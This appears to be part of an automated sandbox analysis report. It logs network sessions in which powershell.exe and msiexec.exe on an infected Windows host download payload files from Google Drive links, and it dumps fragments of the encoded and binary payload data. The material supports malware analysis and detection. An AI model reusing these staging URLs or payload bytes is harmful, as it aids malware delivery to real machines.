                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.649690142.250.185.974437424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-10 08:19:12 UTC139OUTGET /download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download HTTP/1.1
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-10 08:19:16 UTC5014INHTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: AKDAyIucMVonh-6XRrQz5cODhx_ublIzDViMUZZtV3O0Vp1upUl5ziDxEBlhLFn-fFxCxxMB
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="Cigarfabrikker.afm"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 470504
                                                                                  Last-Modified: Mon, 10 Mar 2025 02:53:44 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:19:15 GMT
                                                                                  Expires: Mon, 10 Mar 2025 08:19:15 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=BNVi9w==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close
                                                                                  2025-03-10 08:19:16 UTC5014INData Raw: 67 2f 45 41 77 65 41 41 75 2b 73 37 47 77 43 45 79 59 50 4f 41 41 4e 63 4a 41 53 41 79 51 44 34 75 54 6e 30 62 52 65 41 36 67 42 6d 67 38 6f 41 67 66 48 4b 36 74 55 57 67 2f 41 41 2b 49 48 78 38 78 36 34 41 5a 74 6d 67 66 36 53 77 49 50 4b 41 49 44 37 48 62 72 53 51 6a 59 39 5a 6f 50 49 41 49 58 53 67 50 4d 41 5a 6f 50 76 41 44 48 4b 67 38 59 41 50 64 47 33 34 77 6d 4a 46 41 75 44 78 77 44 5a 30 4e 48 69 49 64 75 45 77 49 50 42 42 4d 48 71 41 4a 75 42 2b 64 56 6d 7a 51 56 38 30 6f 54 53 2b 49 74 45 4a 41 52 6d 67 2f 59 41 4e 41 43 4a 77 32 61 44 37 77 42 6d 67 2b 34 41 67 63 4f 4e 58 32 59 45 49 4d 6e 34 75 71 61 6c 55 4a 50 5a 30 47 61 44 78 77 43 42 38 70 69 58 4d 4d 6e 34 77 4f 45 41 67 63 4c 43 7a 5a 2b 6c 32 64 43 42 2f 36 34 50 53 6c 46 6d 67 38 73
                                                                                  Data Ascii: g/EAweAAu+s7GwCEyYPOAANcJASAyQD4uTn0bReA6gBmg8oAgfHK6tUWg/AA+IHx8x64AZtmgf6SwIPKAID7HbrSQjY9ZoPIAIXSgPMAZoPvADHKg8YAPdG34wmJFAuDxwDZ0NHiIduEwIPBBMHqAJuB+dVmzQV80oTS+ItEJARmg/YANACJw2aD7wBmg+4AgcONX2YEIMn4uqalUJPZ0GaDxwCB8piXMMn4wOEAgcLCzZ+l2dCB/64PSlFmg8s
                                                                                  2025-03-10 08:19:16 UTC4670INData Raw: 76 4f 36 35 6a 54 6e 43 56 35 30 38 46 39 31 4d 63 5a 67 70 35 42 54 51 66 30 72 4e 42 71 68 6a 30 6b 52 71 43 62 48 58 6e 38 79 39 75 41 36 74 64 61 76 41 69 4a 69 6b 35 6f 44 51 65 74 2b 54 39 70 54 54 30 44 52 6b 30 6b 42 4b 47 65 59 52 6c 4d 53 37 66 52 74 51 6a 6e 57 69 41 63 59 56 55 30 34 59 31 57 59 2b 54 54 32 77 78 51 4d 54 44 6d 64 6d 52 75 42 43 4a 57 33 41 49 69 57 78 79 63 76 6f 58 62 7a 71 65 4f 4f 57 33 31 43 35 47 56 69 2b 50 62 31 70 37 54 75 6a 7a 31 49 32 70 78 44 51 72 54 50 73 63 50 55 6d 6f 43 53 78 43 50 64 51 57 51 6a 32 43 71 55 5a 52 42 75 43 35 36 53 57 48 7a 77 41 5a 49 4a 52 52 4c 39 4f 48 79 57 31 53 6f 39 48 6c 66 67 45 6b 51 71 38 44 61 4e 74 63 4b 66 76 58 52 66 6b 55 66 71 6b 76 73 76 36 2f 4a 6a 70 65 68 37 44 4a 53 75
                                                                                  Data Ascii: vO65jTnCV508F91McZgp5BTQf0rNBqhj0kRqCbHXn8y9uA6tdavAiJik5oDQet+T9pTT0DRk0kBKGeYRlMS7fRtQjnWiAcYVU04Y1WY+TT2wxQMTDmdmRuBCJW3AIiWxycvoXbzqeOOW31C5GVi+Pb1p7Tujz1I2pxDQrTPscPUmoCSxCPdQWQj2CqUZRBuC56SWHzwAZIJRRL9OHyW1So9HlfgEkQq8DaNtcKfvXRfkUfqkvsv6/Jjpeh7DJSu
                                                                                  2025-03-10 08:19:16 UTC1322INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4f 70 62 4e 39 50 6c 57 69 42 30 35 56 6f 67 64 4f 56 61 49 48 54 37 52 6e 6d 6d 2f 46 47 63 76 31 7a 73 42 2f 54 36 72 77 6a 4c 2b 30 6e 43 72 57 34 64 4a 50 31 67 4e 69 46 30 35 5a 61 57 6d 58 5a 33 56 44 6d 6d 2f 31 41 36 71 37 42 35 47 55 64 51 4e 41 4a 6b 41 62 61 55 46 55 6a 4a 66 47 53 6c 56 58 34 6d 53 33 49 53 51 39 77 46 6b 51 5a 6e 4b 73 6b 6c 2b 76 31 77 66 74 4f 56 4b 4f 64 61 49 4d 6f 6a 6e 55 4e
                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOpbN9PlWiB05VogdOVaIHT7Rnmm/FGcv1zsB/T6rwjL+0nCrW4dJP1gNiF05ZaWmXZ3VDmm/1A6q7B5GUdQNAJkAbaUFUjJfGSlVX4mS3ISQ9wFkQZnKskl+v1wftOVKOdaIMojnUN
                                                                                  2025-03-10 08:19:16 UTC1378INData Raw: 78 79 7a 43 53 48 51 51 69 61 31 4c 46 75 44 2f 55 58 42 34 2f 6a 6b 4e 76 53 4f 50 77 65 65 66 55 58 5a 76 61 65 6a 64 76 69 42 79 6d 6f 74 43 4e 35 30 38 64 39 38 73 64 47 38 54 49 70 4b 4c 73 38 49 75 68 4e 79 37 62 76 6a 31 47 76 65 57 2f 66 65 66 42 38 54 41 52 6a 6f 39 78 6f 70 61 2b 36 59 75 6f 75 62 4f 39 52 64 75 56 61 6e 6d 78 56 6d 42 4d 6d 58 2b 74 6b 36 70 66 62 30 74 71 75 76 61 50 31 44 33 31 56 44 42 54 54 4d 6e 4a 32 71 73 45 4b 2f 78 52 6b 70 38 67 48 4b 75 69 77 64 61 46 57 6e 63 35 36 65 2b 53 74 6e 33 54 6c 57 69 42 30 35 56 6f 67 64 4f 56 61 49 47 31 69 6c 4e 67 51 53 2f 6e 79 63 53 43 57 61 4b 74 52 7a 47 68 77 72 56 4b 68 67 70 5a 6a 61 7a 43 7a 35 46 49 6d 6d 38 2b 68 6d 6a 47 61 44 34 4e 6b 72 4a 4c 54 52 4f 61 68 73 71 79 34 54
                                                                                  Data Ascii: xyzCSHQQia1LFuD/UXB4/jkNvSOPweefUXZvaejdviBymotCN508d98sdG8TIpKLs8IuhNy7bvj1GveW/fefB8TARjo9xopa+6YuoubO9RduVanmxVmBMmX+tk6pfb0tquvaP1D31VDBTTMnJ2qsEK/xRkp8gHKuiwdaFWnc56e+Stn3TlWiB05VogdOVaIG1ilNgQS/nycSCWaKtRzGhwrVKhgpZjazCz5FImm8+hmjGaD4NkrJLTROahsqy4T
                                                                                  2025-03-10 08:19:16 UTC1378INData Raw: 7a 6e 67 75 31 48 36 45 50 5a 70 59 71 76 42 2b 54 54 41 65 37 2b 73 70 4f 62 4c 68 67 2b 72 36 4d 53 6f 6b 38 71 31 4c 4c 4d 49 63 34 36 58 53 6a 71 6e 4f 76 4e 4e 34 63 53 6e 71 32 6e 62 68 46 64 6e 41 44 78 56 76 56 56 47 55 58 70 7a 31 64 56 53 44 34 61 57 54 46 4e 41 45 71 62 66 4d 6c 34 36 54 58 67 42 77 62 6e 39 79 33 64 32 31 70 65 63 33 36 56 67 67 64 4f 56 56 49 62 32 59 57 69 42 30 35 56 6f 67 64 4f 56 61 49 48 54 6c 65 33 44 4b 67 57 31 6e 4f 41 52 79 4a 53 41 70 44 70 75 34 34 51 67 35 4f 69 50 4a 62 38 4d 72 76 37 69 55 38 79 2f 42 4e 77 4a 63 57 4c 4f 77 50 32 4b 38 34 6d 5a 6a 71 53 6b 67 75 5a 63 44 6e 56 41 42 35 61 78 2b 70 6d 34 58 4f 4d 35 2f 6d 70 70 68 44 61 52 61 63 4f 58 54 70 55 6a 6b 57 69 43 34 42 30 56 46 75 37 59 72 72 6b 4d
                                                                                  Data Ascii: zngu1H6EPZpYqvB+TTAe7+spObLhg+r6MSok8q1LLMIc46XSjqnOvNN4cSnq2nbhFdnADxVvVVGUXpz1dVSD4aWTFNAEqbfMl46TXgBwbn9y3d21pec36VggdOVVIb2YWiB05VogdOVaIHTle3DKgW1nOARyJSApDpu44Qg5OiPJb8Mrv7iU8y/BNwJcWLOwP2K84mZjqSkguZcDnVAB5ax+pm4XOM5/mpphDaRacOXTpUjkWiC4B0VFu7YrrkM
                                                                                  2025-03-10 08:19:16 UTC1378INData Raw: 59 76 57 57 34 49 39 46 73 4f 4f 6d 69 39 32 39 59 66 45 6c 48 37 4a 56 78 6e 66 42 75 77 32 39 46 6d 42 73 4c 52 39 51 77 71 39 73 6a 6e 32 38 6d 46 2b 6d 43 43 2f 64 79 4e 32 2b 72 74 56 6b 71 4f 4b 30 6f 69 61 39 51 49 51 47 6f 36 45 6d 6b 6c 4c 61 6e 70 4c 69 35 6a 44 41 44 72 49 4b 6d 50 69 74 76 51 4c 57 53 73 34 58 46 35 6b 71 47 61 47 37 4b 72 50 37 50 6b 45 30 52 66 38 61 47 43 6b 74 56 77 57 47 53 73 4a 48 59 50 33 61 6c 36 75 59 72 36 46 2f 6e 4b 4f 53 42 67 6e 62 34 31 57 35 41 43 62 72 56 7a 73 72 4f 55 43 33 34 6d 58 2f 45 79 78 57 50 62 30 70 61 59 4f 77 58 31 46 79 49 7a 6d 65 48 62 79 74 65 56 4e 34 72 31 4a 79 6a 56 57 2b 59 4c 76 50 30 45 55 7a 48 70 59 4a 78 62 5a 38 43 44 67 52 77 32 46 2f 62 2b 4d 33 4e 61 31 36 32 51 4f 2b 6d 57 55
                                                                                  Data Ascii: YvWW4I9FsOOmi929YfElH7JVxnfBuw29FmBsLR9Qwq9sjn28mF+mCC/dyN2+rtVkqOK0oia9QIQGo6EmklLanpLi5jDADrIKmPitvQLWSs4XF5kqGaG7KrP7PkE0Rf8aGCktVwWGSsJHYP3al6uYr6F/nKOSBgnb41W5ACbrVzsrOUC34mX/EyxWPb0paYOwX1FyIzmeHbyteVN4r1JyjVW+YLvP0EUzHpYJxbZ8CDgRw2F/b+M3Na162QO+mWU
                                                                                  2025-03-10 08:19:16 UTC1378INData Raw: 73 48 73 6a 50 56 36 6c 71 30 70 47 46 79 73 49 65 38 69 42 52 38 42 6f 4a 34 4a 7a 6e 71 48 78 50 31 73 67 64 4c 65 66 57 4e 75 32 34 54 34 42 57 33 69 68 68 36 47 68 32 45 4a 6b 73 65 76 61 6f 45 36 70 52 34 65 4c 4f 6c 2f 4b 74 36 72 7a 4b 48 30 4b 51 4f 61 30 4b 44 35 6f 4d 6c 57 69 6f 33 6b 63 36 46 66 39 5a 2f 75 58 49 67 6f 50 49 2f 66 67 4b 7a 69 51 76 74 41 41 45 41 59 6e 4e 46 36 64 4d 62 35 68 70 61 37 6b 57 69 42 37 61 4a 51 69 64 4f 55 79 64 32 56 52 51 61 46 77 77 53 6b 67 32 78 4d 4c 6d 64 4a 59 4b 4f 33 31 46 47 77 66 72 47 54 62 79 59 46 2b 38 32 7a 39 33 4d 33 58 57 4e 6b 58 52 56 31 6b 7a 6f 64 37 71 6b 64 72 65 6e 65 79 78 73 64 6d 59 58 48 74 77 51 56 59 62 35 64 50 61 63 78 42 6a 35 4c 6b 4c 50 78 36 51 32 36 6b 52 31 4a 6a 35 4c 41
                                                                                  Data Ascii: sHsjPV6lq0pGFysIe8iBR8BoJ4JznqHxP1sgdLefWNu24T4BW3ihh6Gh2EJksevaoE6pR4eLOl/Kt6rzKH0KQOa0KD5oMlWio3kc6Ff9Z/uXIgoPI/fgKziQvtAAEAYnNF6dMb5hpa7kWiB7aJQidOUyd2VRQaFwwSkg2xMLmdJYKO31FGwfrGTbyYF+82z93M3XWNkXRV1kzod7qkdreneyxsdmYXHtwQVYb5dPacxBj5LkLPx6Q26kR1Jj5LA
                                                                                  2025-03-10 08:19:16 UTC1378INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 48 48 4e 78 69 78 61 65 6d 53 62 4a 79 75 2b 55 36 47 46 56 6c 76 6e 35 57 53 72 50 4d 37 33 33 4b 6c 46 38 71 74 4a 30 6a 2f 67 68 4c 45 42 56 62 53 72 39 59 41 75 4e 73 35 69 59 4a 4e 52 4b 59 50 72 31 79 50 47 76 75 50 2b 56 51 32 74 79 68 6b 50 2b 4e 48 4d 4f 39 6d 4e 4f 30 7a 70 2b 53 47 49 72
                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHNxixaemSbJyu+U6GFVlvn5WSrPM733KlF8qtJ0j/ghLEBVbSr9YAuNs5iYJNRKYPr1yPGvuP+VQ2tyhkP+NHMO9mNO0zp+SGIr
                                                                                  2025-03-10 08:19:16 UTC1378INData Raw: 38 63 6a 6a 4e 50 34 39 71 38 6c 67 67 32 50 78 4c 57 43 62 65 76 39 51 73 43 46 30 35 51 32 66 71 4d 47 4c 69 50 55 53 6f 4a 32 47 6d 4e 76 50 69 62 63 51 36 2f 55 53 6f 4b 58 75 42 4e 76 58 50 63 51 5a 79 50 33 53 73 47 4d 75 68 54 32 6e 53 34 59 73 2f 47 75 61 39 35 68 59 42 34 48 4a 30 75 34 46 71 63 45 64 57 79 42 30 36 6c 7a 6d 73 2b 56 61 49 48 54 6c 57 69 42 30 35 56 6f 67 64 4f 30 67 63 43 42 50 48 39 4f 48 76 69 46 46 71 61 6b 46 32 78 32 6e 4f 4b 39 5a 75 32 71 5a 66 54 4f 48 47 7a 35 53 48 33 4c 54 72 6a 61 70 73 72 4e 56 49 55 54 63 57 69 42 30 35 56 6f 67 64 4f 56 61 49 48 54 6c 51 58 48 75 49 73 39 42 4f 36 35 37 5a 46 47 45 76 65 49 47 35 6b 43 72 77 52 31 62 49 48 51 4e 6d 6f 68 77 35 51 6d 62 46 30 68 46 50 50 55 57 4d 61 37 2b 37 74 76
                                                                                  Data Ascii: 8cjjNP49q8lgg2PxLWCbev9QsCF05Q2fqMGLiPUSoJ2GmNvPibcQ6/USoKXuBNvXPcQZyP3SsGMuhT2nS4Ys/Gua95hYB4HJ0u4FqcEdWyB06lzms+VaIHTlWiB05VogdO0gcCBPH9OHviFFqakF2x2nOK9Zu2qZfTOHGz5SH3LTrjapsrNVIUTcWiB05VogdOVaIHTlQXHuIs9BO657ZFGEveIG5kCrwR1bIHQNmohw5QmbF0hFPPUWMa7+7tv
                                                                                  2025-03-10 08:19:16 UTC1378INData Raw: 6b 2f 76 49 66 5a 42 78 69 73 75 74 72 63 4b 37 7a 54 79 2f 63 6d 50 71 6e 68 77 31 67 67 64 4f 70 64 6c 33 54 6c 57 69 42 30 35 56 6f 67 64 4f 56 61 49 48 54 41 49 42 72 2b 73 78 4e 39 6b 66 5a 72 46 68 6b 52 5a 65 37 39 50 77 69 72 34 63 4e 59 49 48 52 73 33 7a 6c 32 35 56 72 54 65 79 4a 74 49 48 54 6c 57 69 42 30 35 56 6f 67 64 4f 56 61 4d 65 35 5a 6f 6f 4c 70 4d 7a 4f 62 38 7a 39 63 56 77 45 7a 4b 36 72 41 50 59 53 4d 7a 65 70 6c 61 77 50 72 34 6b 58 4d 75 42 30 4e 4b 4b 64 35 51 45 45 36 70 4a 42 5a 73 2b 52 44 4c 33 47 61 6f 62 4b 72 43 77 30 30 5a 4b 77 77 65 74 50 50 6f 59 4a 45 6c 53 4f 36 5a 4b 79 5a 65 52 45 42 71 55 70 59 76 76 42 37 66 6a 35 34 4d 4a 42 41 32 55 44 6b 48 77 4a 32 4d 4a 4a 33 42 4e 4a 6c 66 68 4c 71 6e 52 4e 30 35 56 6f 67 64
                                                                                  Data Ascii: k/vIfZBxisutrcK7zTy/cmPqnhw1ggdOpdl3TlWiB05VogdOVaIHTAIBr+sxN9kfZrFhkRZe79Pwir4cNYIHRs3zl25VrTeyJtIHTlWiB05VogdOVaMe5ZooLpMzOb8z9cVwEzK6rAPYSMzeplawPr4kXMuB0NKKd5QEE6pJBZs+RDL3GaobKrCw00ZKwwetPPoYJElSO6ZKyZeREBqUpYvvB7fj54MJBA2UDkHwJ2MJJ3BNJlfhLqnRN05Vogd


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649697216.58.212.1744438184C:\Windows\SysWOW64\msiexec.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-10 08:20:17 UTC216OUTGET /uc?export=download&id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  2025-03-10 08:20:18 UTC1610INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:20:17 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-nr-87Fm4ZRW1gaALH2aArw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.649698142.250.185.974438184C:\Windows\SysWOW64\msiexec.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-10 08:20:21 UTC258OUTGET /download?id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-10 08:20:24 UTC5023INHTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: AKDAyIst82Mt5ezJS3Zrm4uT2zQDIkYTyBmPG9EXAHD87t0LJpbyRfbHBSrYb6CTqyq0shSQlmfGnfs
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="qKdUnHotNCBXp148.bin"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 498752
                                                                                  Last-Modified: Mon, 10 Mar 2025 02:51:36 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:20:24 GMT
                                                                                  Expires: Mon, 10 Mar 2025 08:20:24 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=VZTmxw==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close
                                                                                  2025-03-10 08:20:24 UTC5023INData Raw: 92 b2 fe 0f 12 06 5b f4 dc ef d2 4c 73 1a 6d 59 11 ea fc 96 85 d5 bb f4 5b 31 73 aa e8 8c db 79 7c fd e1 ff 1d 4e 30 2e 85 02 fe ea 74 ed bb 98 49 76 ef fa 51 eb 60 34 2d 7b 35 ff b7 52 da 4c a3 e5 bd 33 00 7b e8 33 c5 12 12 41 ba fe e0 b1 fc 8e ee c9 70 3b 87 69 67 8e 7d 49 dd 30 a4 6d 0b 74 b2 57 e5 55 5a 09 10 59 43 f2 34 82 6f e2 e6 72 05 e5 40 4a 9a 23 08 29 38 0f a4 d6 4f 21 24 38 71 f8 d7 33 d7 01 4f fd 9e b7 d9 66 a7 8e 74 ad b2 e0 1c 14 8f 00 21 88 e3 80 b0 70 2c ac 35 a8 b7 22 4b 58 ff 71 76 2b 90 fb e3 88 88 fc 24 cd 55 ad 29 6b b1 ee a3 6e c4 c5 67 b8 1a 11 2d 44 58 da 24 01 33 8a 07 c3 65 bf a9 49 2f 7d 8d 30 09 43 8a c3 12 a6 ed 67 a6 4f 79 d2 fd 29 2e 7b c1 4a 46 0e 64 9c 24 0c 06 f9 54 6f 90 90 e9 27 10 e4 49 73 b7 7b 2e d8 7c 1c 18 db 40
                                                                                  Data Ascii: [LsmY[1sy|N0.tIvQ`4-{5RL3{3Ap;ig}I0mtWUZYC4or@J#)8O!$8q3Oft!p,5"KXqv+$U)kng-DX$3eI/}0CgOy).{JFd$To'Is{.|@
                                                                                  2025-03-10 08:20:24 UTC4652INData Raw: 5d ca 02 e7 47 fc e8 69 69 1b 17 ab 14 59 35 43 1a bf 9c 6e 0e e0 9f 71 47 25 d0 6e 3a 80 04 98 4b 0d e6 8f 3c ae ca 92 2a 52 f1 d2 57 f6 b2 c8 5a 96 c9 18 9d e6 8a 4b 83 40 64 cf a9 a4 55 a5 fa 06 17 af 03 e3 08 e9 53 57 aa 73 e2 26 a7 fc a3 d3 b5 7c e4 9d 3f f9 ec 1e 59 18 5f b6 56 77 f6 21 bd 61 e7 11 bc e6 9c 0d 37 77 d2 96 a4 d9 82 bd f0 b0 87 ac 12 26 96 ff 34 35 d7 a5 e1 18 e0 0e 2b 52 b6 5d 25 f7 ac 80 6c 39 ad d7 1d 6a 39 5f 68 46 ae 87 11 f0 7d e9 fe c4 a6 96 56 1d 47 37 f0 47 ed a1 ec d1 77 d5 5a 82 1e 88 6b c2 46 e4 68 43 0d e5 d9 bc cb 24 5c 26 ac 7e 62 6a 5a d3 62 5d 11 24 7e 3a 52 bc d2 fc c5 99 ba 60 4f 7c 7f 88 a4 34 27 e1 18 31 45 9b f7 38 fd 73 d5 3f 8d 12 f2 4b f5 67 d9 cd 07 29 c1 c2 25 c1 34 9f 1c 36 47 be 28 30 39 92 7a d3 b0 c6 8f
                                                                                  Data Ascii: ]GiiY5CnqG%n:K<*RWZK@dUSWs&|?Y_Vw!a7w&45+R]%l9j9_hF}VG7GwZkFhC$\&~bjZb]$~:R`O|4'1E8s?Kg)%46G(09z
